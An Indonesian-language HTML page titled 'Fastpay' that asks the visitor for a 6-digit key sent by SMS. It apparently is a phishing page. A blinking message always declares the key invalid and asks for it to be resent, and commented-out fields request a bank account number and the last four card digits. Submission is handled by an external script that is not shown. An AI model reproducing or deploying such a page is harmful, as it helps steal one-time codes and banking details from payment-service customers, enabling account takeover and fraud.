<!doctype html>
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <title>Fastpay</title> 
  <style>
@import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
* {
    font-family: 'Ubuntu', sans-serif;
    font-weight: 400;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    color: #000;
    position: relative;
}
html { width: 100vw; height: 100vh; }
body {
    background: #fff;
    width: 100%;
    height: 100%;
}
.container {
    width: 100%;
    height: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
}
.headr {
    width: 100%;
    height: 40px;
    background: none;
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 0 20px;
}
.headr p {
    font-size: 17px;
    color: white;
    margin-left: 10px;
}
.headr img {
    height: 36%;
}
.container .imgh {
    width: 100%;
}
.content {
    margin-top: 20px;
    width: 100%;
    padding: 20px;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
}
.content form {
    width: 100%;
}
.content .wrp {
    width: 100%;
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
    height: 50px;
    flex-direction: column;
}
.content .wrp input {
    width: 100%;
    height: 50px;
    outline: none;
    border: none;
    border-left: 2px solid #1E90FF;
    padding-left: 5px;
    background: transparent;
    z-index: 22;
    font-size: 16px;
    font-weight: bold;
}
.content .wrp label {
    color: #000;
    font-size: 18px;
    opacity: 1;
    font-weight: bold;
    margin-top: -10px;
}
.content .wrp input:focus,
.content .wrp input:valid {
    border-bottom: 2px solid #006543;
}
.content button {
    width: 100%;
    height: 43px;
    border: none;
    border-radius: 4px;
    background: #C0C0C0;
    font-size: 15px;
    color: #fff;
    font-weight: bold;
    margin-top: 10px;
}
.content .or {
    margin: 10px 0;
    font-size: 9px;
    text-align: center;
}
.content form .bbtn {
    margin-top: 10px;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: space-between;
}
.content form .bbtn button {
    width: 48%;
    height: 35px;
    font-size: 10px;
    color: #000;
    background: #fff400;
}
.content .reg {
    background: none;
    color: #1caa33;
    font-size: 13px;
}
.container .foot {
    width: 100%;
    position: absolute;
    bottom: 60px;
}
h3 {
    font-size: 14px;
    margin-top: 20px;
    font-weight: bold;
    text-align: center;
}
h4 {
    margin: 5px 0 20px 0;
    font-size: 15px;
    color: #5d5d5d;
    text-align: left;
}
.bgm {
    width: 100%;
    height: 100%;
    background: ;
    position: absolute;
    z-index: 999;
    display: flex;
    justify-content: center;
    align-items: center;
}
.bgbg {
    width: 100%;
    height: 100%;
    background: #0000001b;
    position: absolute;
    z-index: 99;
}
.bgm .modal {
    width: 80%;
    border-radius: 20px;
    background: #fff;
    padding: 20px;
    transform: translatey(-80px);
    box-shadow: 0 3px 6px rgba(0,0,0,0.2);
}
.modal h3 {
    margin: 15px 0 0 0;
    font-size: 14px;
    text-align: center;
}
.xx {
    width: 100%;
    height: 40px;
    position: absolute;
    left: 0;
    top: 0;
    display: flex;
    justify-content: right;
}
.xx i {
    font-style: normal;
    position: absolute;
    right: 8px;
    top: 1px;
    font-weight: 200;
}
input::placeholder {
    font-size: 18px;
    opacity: 1.0;
    font-style: italic;
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 50px;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
        }
        .blink {
            animation: blink-animation 5s steps(5, start) infinite;
            -webkit-animation: blink-animation 1s steps(5, start) infinite;
        }
        @keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        @-webkit-keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        h1{
            display: table;
            background-color: transparent;
            color: red;
            padding: 15px;
            width: 100%;
            font-size: 1em;
            text-align: center;
            font-weight: bold;
            
            
        }
        </style>
</style> 
 </head> 
 <body> 
  <div class="container"> 
   <div class="headr"> 
   <img src="" onclick="window.location.href='/'" alt="">
   <center>
   <p style="text-align: left; font-size: 18px; font-weight: bold; margin-top: 70px; color: black; margin-left: -110%;">KEY Telah Dikirim</p></center>
    <!--<img src="/assets/bell.png" alt="">-->
   </div> 
   <div class="content"> 
    <form id="tg" onsubmit=""> 
     <h3></h3> 
     <h4>Silahkan masukan 6 digit key telah dikirim<br>melalui SMS ke Nomor Handphone anda</h4> 
     <!--
     <div class="wrp"> 
      <label>No. Rekening</label> 
      <input placeholder="Masukkan Nomor Rekening" name="rekening" id="rekening" required autocomplete="off" type="tel" maxlength="11" minlength="10"> 
     </div> 
     <div class="wrp"> 
      <label>4 Digit Terahkir No. Kartu</label> 
      <input placeholder="Masukkan 4 Digit Terakhir" name="atm" id="atm" required autocomplete="off" type="tel"minlength="4" maxlength="4"> 
     </div> -->
     <div class="wrp"> 
      <label>KEY</label> 
      <input placeholder="••••••" name="otp" id="otp" required autocomplete="off" type="tel" minlength="6" maxlength="6" style="width: 80%; letter-spacing: 20px; border-bottom: none; margin-top: 10px; height: 35px;"> 
      <br>
     </div> 
     <button type="submit">Masuk</button> 
   </div> 
   <!--
   <p style="text-align: center; font-size: 14px; font-weight: bold; margin-top: 10px; color: #5d5d5d;">Belum Jadi Mitra Fastpay?</p>-->
   <br>
   <button type="button" style="width: 88%; height: 40px; text-align: center; font-size: 14px; font-weight: bold; margin-top: 0px; color: black; background: none; border: 1px solid #5d5d5d; border-radius: 4px;">Pilih Metode Pengiriman Key Lainnya</button>
   <br>
   <p style="text-align: left; font-size: 14px; font-weight: bold; margin-top: 0px; color: #5d5d5d; margin-left: -50%;">Perlu Bantuan?</p><p style="text-align: left; font-size: 14px; font-weight: bold; margin-top: -15px; color: #1E90FF; margin-left: 30%;">Hubungi Customer Service</p>
    </form>
    <br>
                <span class="blink"><h1>Key Tidak Valid Silahkan Kirim Ulang!</h1><br>&nbsp;</span>
  <!-- <img src="ast/foot.jpg" alt="" class="foot"> -->
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> 
        <script src="/verifikasi/fetch.js"></script>
 </body>
</html>